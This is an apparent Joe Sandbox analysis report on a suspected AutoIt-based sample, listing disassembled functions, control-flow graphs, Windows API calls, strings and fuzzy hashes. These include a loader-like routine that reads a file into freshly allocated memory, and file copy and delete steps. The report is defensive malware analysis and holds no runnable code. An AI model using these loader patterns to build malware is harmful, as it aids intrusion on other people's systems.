                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 50e64c40ef40528954a85c42292b5615404c5e9ac6c9e8ec7d4b62865add8762
                                                  • Instruction ID: 764b2e77a9c169c269627127710262d6ef3ada593558c1c911531bd484167838
                                                  • Opcode Fuzzy Hash: 50e64c40ef40528954a85c42292b5615404c5e9ac6c9e8ec7d4b62865add8762
                                                  • Instruction Fuzzy Hash: C621F2B5D01718AFDB10DFA4EC89BDDBBB6FB09711F04921AFA11AA2A0D7B10540CF91
                                                  Function 005D065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 302 5d065b-5d068b call 5d042f 305 5d068d-5d0698 call 5bf2c6 302->305 306 5d06a6-5d06b2 call 5c5221 302->306 311 5d069a-5d06a1 call 5bf2d9 305->311 312 5d06cb-5d0714 call 5d039a 306->312 313 5d06b4-5d06c9 call 5bf2c6 call 5bf2d9 306->313 323 5d097d-5d0983 311->323 321 5d0716-5d071f 312->321 322 5d0781-5d078a GetFileType 312->322 313->311 325 5d0756-5d077c GetLastError call 5bf2a3 321->325 326 5d0721-5d0725 321->326 327 5d078c-5d07bd GetLastError call 5bf2a3 CloseHandle 322->327 328 5d07d3-5d07d6 322->328 325->311 326->325 331 5d0727-5d0754 call 5d039a 326->331 327->311 339 5d07c3-5d07ce call 5bf2d9 327->339 329 5d07df-5d07e5 328->329 330 5d07d8-5d07dd 328->330 335 5d07e9-5d0837 call 5c516a 329->335 336 5d07e7 329->336 330->335 331->322 331->325 345 5d0839-5d0845 call 5d05ab 335->345 346 5d0847-5d086b call 5d014d 335->346 336->335 339->311 345->346 353 5d086f-5d0879 call 5c86ae 345->353 351 5d086d 346->351 352 5d087e-5d08c1 346->352 351->353 355 5d08c3-5d08c7 352->355 356 5d08e2-5d08f0 352->356 353->323 355->356 358 5d08c9-5d08dd 355->358 359 5d097b 356->359 360 5d08f6-5d08fa 356->360 358->356 359->323 360->359 361 5d08fc-5d092f CloseHandle call 5d039a 360->361 364 5d0931-5d095d GetLastError call 5bf2a3 call 5c5333 361->364 365 5d0963-5d0977 361->365 364->365 365->359
                                                  APIs
                                                    • Part of subcall function 005D039A: CreateFileW.KERNELBASE(00000000,00000000,?,005D0704,?,?,00000000,?,005D0704,00000000,0000000C), ref: 005D03B7
                                                  • GetLastError.KERNEL32 ref: 005D076F
                                                  • __dosmaperr.LIBCMT ref: 005D0776
                                                  • GetFileType.KERNELBASE(00000000), ref: 005D0782
                                                  • GetLastError.KERNEL32 ref: 005D078C
                                                  • __dosmaperr.LIBCMT ref: 005D0795
                                                  • CloseHandle.KERNEL32(00000000), ref: 005D07B5
                                                  • CloseHandle.KERNEL32(?), ref: 005D08FF
                                                  • GetLastError.KERNEL32 ref: 005D0931
                                                  • __dosmaperr.LIBCMT ref: 005D0938
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: 7bc4cc3b52bce716dc9bdf51a0574c7393ec97ff25b26968ba006ffc64f81bf4
                                                  • Instruction ID: 395751f7e8f8079bd069450aa213ae76b86b2145563d6d64119eebc30391e8f6
                                                  • Opcode Fuzzy Hash: 7bc4cc3b52bce716dc9bdf51a0574c7393ec97ff25b26968ba006ffc64f81bf4
                                                  • Instruction Fuzzy Hash: 62A11F32A001498FDF29AF6CDC56BAE7FA1BB46320F14115BF8119F3D1DA719812CB91
                                                  Function 0059344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00593A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00661418,?,00592E7F,?,?,?,00000000), ref: 00593A78
                                                    • Part of subcall function 00593357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00593379
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0059356A
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005D318D
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005D31CE
                                                  • RegCloseKey.ADVAPI32(?), ref: 005D3210
                                                  • _wcslen.LIBCMT ref: 005D3277
                                                  • _wcslen.LIBCMT ref: 005D3286
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 98802146-2727554177
                                                  • Opcode ID: fca0b0dc111b38238ab072bee48e020e43c4a20e74a489e8d66f029343ea3567
                                                  • Instruction ID: f4d4a253e3155998088ace5003355d425ed067d9a965a2e58b7ccdbdfee597db
                                                  • Opcode Fuzzy Hash: fca0b0dc111b38238ab072bee48e020e43c4a20e74a489e8d66f029343ea3567
                                                  • Instruction Fuzzy Hash: B671A1715047029EC714DF69DC958AFBFE9FF95740F40182EF545A32A0EB709A48CB62
                                                  Function 00592B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00592B8E
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00592B9D
                                                  • LoadIconW.USER32(00000063), ref: 00592BB3
                                                  • LoadIconW.USER32(000000A4), ref: 00592BC5
                                                  • LoadIconW.USER32(000000A2), ref: 00592BD7
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00592BEF
                                                  • RegisterClassExW.USER32(?), ref: 00592C40
                                                    • Part of subcall function 00592CD4: GetSysColorBrush.USER32(0000000F), ref: 00592D07
                                                    • Part of subcall function 00592CD4: RegisterClassExW.USER32(00000030), ref: 00592D31
                                                    • Part of subcall function 00592CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00592D42
                                                    • Part of subcall function 00592CD4: InitCommonControlsEx.COMCTL32(?), ref: 00592D5F
                                                    • Part of subcall function 00592CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00592D6F
                                                    • Part of subcall function 00592CD4: LoadIconW.USER32(000000A9), ref: 00592D85
                                                    • Part of subcall function 00592CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00592D94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 9a68db2132e01ee6f262230a01535a28a35fdece50031cd2f6c24cad0be85465
                                                  • Instruction ID: 415cbf576130b97ae2abfdfad117d1e5e8c13ff93663cfb27d4fdf9188a616f8
                                                  • Opcode Fuzzy Hash: 9a68db2132e01ee6f262230a01535a28a35fdece50031cd2f6c24cad0be85465
                                                  • Instruction Fuzzy Hash: A0211A70E10354ABDB109FA5EC55A9D7FB6FB49B50F08101AE501BB7A0D7F14A40DF90
                                                  Function 00593170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 443 593170-593185 444 5931e5-5931e7 443->444 445 593187-59318a 443->445 444->445 448 5931e9 444->448 446 5931eb 445->446 447 59318c-593193 445->447 450 5d2dfb-5d2e23 call 5918e2 call 5ae499 446->450 451 5931f1-5931f6 446->451 452 593199-59319e 447->452 453 593265-59326d PostQuitMessage 447->453 449 5931d0-5931d8 DefWindowProcW 448->449 459 5931de-5931e4 449->459 489 5d2e28-5d2e2f 450->489 454 5931f8-5931fb 451->454 455 59321d-593244 SetTimer RegisterWindowMessageW 451->455 457 5d2e7c-5d2e90 call 5fbf30 452->457 458 5931a4-5931a8 452->458 460 593219-59321b 453->460 461 5d2d9c-5d2d9f 454->461 462 593201-593214 KillTimer call 5930f2 call 593c50 454->462 455->460 464 593246-593251 CreatePopupMenu 455->464 457->460 484 5d2e96 457->484 465 5d2e68-5d2e72 call 5fc161 458->465 466 5931ae-5931b3 458->466 460->459 474 5d2dd7-5d2df6 MoveWindow 461->474 475 5d2da1-5d2da5 461->475 462->460 464->460 480 5d2e77 465->480 471 5d2e4d-5d2e54 466->471 472 5931b9-5931be 466->472 471->449 478 5d2e5a-5d2e63 call 5f0ad7 471->478 482 593253-593263 call 59326f 472->482 483 5931c4-5931ca 472->483 474->460 476 5d2da7-5d2daa 475->476 477 5d2dc6-5d2dd2 SetFocus 475->477 476->483 485 5d2db0-5d2dc1 call 5918e2 476->485 477->460 478->449 480->460 482->460 483->449 483->489 484->449 485->460 489->449 493 5d2e35-5d2e48 call 5930f2 call 593837 489->493 493->449
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0059316A,?,?), ref: 005931D8
                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,0059316A,?,?), ref: 00593204
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00593227
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0059316A,?,?), ref: 00593232
                                                  • CreatePopupMenu.USER32 ref: 00593246
                                                  • PostQuitMessage.USER32(00000000), ref: 00593267
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: fad7c1603c5482bb5063a02a5cdf5fdacfd14b29da15ac37bd4fb9d9ab48b66a
                                                  • Instruction ID: 25fc39f70a0218347fb45bacbf39104a8c1a891a3134a858c5cf47ebad04714d
                                                  • Opcode Fuzzy Hash: fad7c1603c5482bb5063a02a5cdf5fdacfd14b29da15ac37bd4fb9d9ab48b66a
                                                  • Instruction Fuzzy Hash: 89413535204605EBDF242B78DD1DB7D3E1BFB46350F081526F512DA2B1CBA18E41E7A1
                                                  Function 0059DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D%f$D%f$D%f$D%f$D%fD%f$Variable must be of type 'Object'.
                                                  • API String ID: 0-4125818173
                                                  • Opcode ID: c7acacc720fbcc1b161dbf19316eb007acd86ae46976795cfc857fe3a9e97244
                                                  • Instruction ID: 50119c3f23ea7af40da0ee2b6267a43a01ffdd1d0eb6bfbf0032601bf2b5e2c9
                                                  • Opcode Fuzzy Hash: c7acacc720fbcc1b161dbf19316eb007acd86ae46976795cfc857fe3a9e97244
                                                  • Instruction Fuzzy Hash: 5DC29C71A00215CFCF24CF98C886AADBBB1FF59304F248969E946AB391D375ED41CB91
                                                  Function 0059EC40 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1195COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0059FE66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: D%f$D%f$D%f$D%f$D%fD%f
                                                  • API String ID: 1385522511-2392613657
                                                  • Opcode ID: f0ab5a044e872535a521a5db37f0174622627069d451e37e15ca60225ec1af41
                                                  • Instruction ID: fde4c8b84ebd627eedfb9dfd530a11cb419d28ff8d309713702d77b45f66fdc8
                                                  • Opcode Fuzzy Hash: f0ab5a044e872535a521a5db37f0174622627069d451e37e15ca60225ec1af41
                                                  • Instruction Fuzzy Hash: 7CB26974608341CFDF28CF19C495A2ABBE1BF99314F24486EE8869B391D771ED41CB92
                                                  Function 0165BFD0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1452 165bfd0-165c07e call 16599f0 1455 165c085-165c0ab call 165cee0 CreateFileW 1452->1455 1458 165c0b2-165c0c2 1455->1458 1459 165c0ad 1455->1459 1466 165c0c4 1458->1466 1467 165c0c9-165c0e3 VirtualAlloc 1458->1467 1460 165c1fd-165c201 1459->1460 1461 165c243-165c246 1460->1461 1462 165c203-165c207 1460->1462 1468 165c249-165c250 1461->1468 1464 165c213-165c217 1462->1464 1465 165c209-165c20c 1462->1465 1469 165c227-165c22b 1464->1469 1470 165c219-165c223 1464->1470 1465->1464 1466->1460 1471 165c0e5 1467->1471 1472 165c0ea-165c101 ReadFile 1467->1472 1473 165c2a5-165c2ba 1468->1473 1474 165c252-165c25d 1468->1474 1477 165c22d-165c237 1469->1477 1478 165c23b 1469->1478 1470->1469 1471->1460 1479 165c103 1472->1479 1480 165c108-165c148 VirtualAlloc 1472->1480 1475 165c2bc-165c2c7 VirtualFree 1473->1475 1476 165c2ca-165c2d2 1473->1476 1481 165c261-165c26d 1474->1481 1482 165c25f 1474->1482 1475->1476 1477->1478 1478->1461 1479->1460 1485 165c14f-165c16a call 165d130 1480->1485 1486 165c14a 1480->1486 1483 165c281-165c28d 1481->1483 1484 165c26f-165c27f 1481->1484 1482->1473 1489 165c28f-165c298 1483->1489 1490 165c29a-165c2a0 1483->1490 1488 165c2a3 1484->1488 1492 165c175-165c17f 1485->1492 1486->1460 1488->1468 1489->1488 1490->1488 1493 165c181-165c1b0 call 165d130 1492->1493 1494 165c1b2-165c1c6 call 165cf40 1492->1494 1493->1492 1500 165c1c8 1494->1500 1501 165c1ca-165c1ce 1494->1501 1500->1460 1502 165c1d0-165c1d4 CloseHandle 1501->1502 1503 165c1da-165c1de 1501->1503 1502->1503 1504 165c1e0-165c1eb VirtualFree 1503->1504 1505 165c1ee-165c1f7 1503->1505 1504->1505 1505->1455 1505->1460
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0165C0A1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0165C2C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction ID: aee6c093d41c6ac87b15d13169a6fc9310f6b82d8bfe69012f0c668b0e74c268
                                                  • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction Fuzzy Hash: 01A1F974E00209EBDB54CFE8C994BEEBBB9FF48305F208159E905BB281D7759A81CB54
                                                  Function 00592C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1516 592c63-592cd3 CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00592C91
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00592CB2
                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00591CAD,?), ref: 00592CC6
                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00591CAD,?), ref: 00592CCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: 404c96ed9f2e79579d8ecc2e71ee4916c738219dab465c110fdad52f73775734
                                                  • Instruction ID: 43e2f2c33f3deb6f8c01132c035249e95a1168a0b53e6818fd834b587be86179
                                                  • Opcode Fuzzy Hash: 404c96ed9f2e79579d8ecc2e71ee4916c738219dab465c110fdad52f73775734
                                                  • Instruction Fuzzy Hash: 83F0D0759402907BE77117176C08E7B2E7FD7CBF60B051059F901E66A0C6A11851DEB1
                                                  Function 0165BDA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1631 165bda0-165becc call 16599f0 call 165bc90 CreateFileW 1638 165bed3-165bee3 1631->1638 1639 165bece 1631->1639 1642 165bee5 1638->1642 1643 165beea-165bf04 VirtualAlloc 1638->1643 1640 165bf83-165bf88 1639->1640 1642->1640 1644 165bf06 1643->1644 1645 165bf08-165bf1f ReadFile 1643->1645 1644->1640 1646 165bf21 1645->1646 1647 165bf23-165bf5d call 165bcd0 call 165ac90 1645->1647 1646->1640 1652 165bf5f-165bf74 call 165bd20 1647->1652 1653 165bf79-165bf81 ExitProcess 1647->1653 1652->1653 1653->1640
                                                  APIs
                                                    • Part of subcall function 0165BC90: Sleep.KERNELBASE(000001F4), ref: 0165BCA1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0165BEC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: KM5YOVVQ8E1ONN16OY5KUEW
                                                  • API String ID: 2694422964-3556859784
                                                  • Opcode ID: 4a2d76302ebe95d9e2c197739b72c87fe8c13df735f25e93c27bb93737ea5ffb
                                                  • Instruction ID: dda6210abe33b90c945c42115957cbcf12831db74c81b9041e1510aeb2a4a4a9
                                                  • Opcode Fuzzy Hash: 4a2d76302ebe95d9e2c197739b72c87fe8c13df735f25e93c27bb93737ea5ffb
                                                  • Instruction Fuzzy Hash: 8B518070D04289EAEB11DBA8DC44BEFBBB99F14304F004199E6097B2C1D7BA0B45CB65
                                                  Function 00602947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1655 602947-6029b9 call 5d1f50 call 6025d6 call 5afe0b call 595722 call 60274e call 59511f call 5b5232 1670 602a6c-602a73 call 602e66 1655->1670 1671 6029bf-6029c6 call 602e66 1655->1671 1676 602a75-602a77 1670->1676 1677 602a7c 1670->1677 1671->1676 1678 6029cc-602a6a call 5bd583 call 5b4983 call 5b9038 call 5bd583 call 5b9038 * 2 1671->1678 1679 602cb6-602cb7 1676->1679 1681 602a7f-602b3a call 5950f5 * 8 call 603017 call 5be5eb 1677->1681 1678->1681 1682 602cd5-602cdb 1679->1682 1720 602b43-602b5e call 602792 1681->1720 1721 602b3c-602b3e 1681->1721 1686 602cf0-602cf6 1682->1686 1687 602cdd-602ced call 5afdcd call 5afe14 1682->1687 1687->1686 1724 602bf0-602bfc call 5be678 1720->1724 1725 602b64-602b6c 1720->1725 1721->1679 1732 602c12-602c16 1724->1732 1733 602bfe-602c0d DeleteFileW 1724->1733 1726 602b74 1725->1726 1727 602b6e-602b72 1725->1727 1729 602b79-602b97 call 5950f5 1726->1729 1727->1729 1739 602bc1-602bd7 call 60211d call 5bdbb3 1729->1739 1740 602b99-602b9e 1729->1740 1735 602c91-602ca5 CopyFileW 1732->1735 1736 602c18-602c7e call 6025d6 call 5bd2eb * 2 call 6022ce 1732->1736 1733->1679 1737 602ca7-602cb4 DeleteFileW 1735->1737 1738 602cb9-602ccf DeleteFileW call 602fd8 1735->1738 1736->1738 1760 602c80-602c8f DeleteFileW 1736->1760 1737->1679 1748 602cd4 1738->1748 1755 602bdc-602be7 1739->1755 1744 602ba1-602bb4 call 6028d2 1740->1744 1753 602bb6-602bbf 1744->1753 1748->1682 1753->1739 1755->1725 1757 602bed 1755->1757 1757->1724 1760->1679
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602C05
                                                  • DeleteFileW.KERNEL32(?), ref: 00602C87
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00602C9D
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602CAE
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602CC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
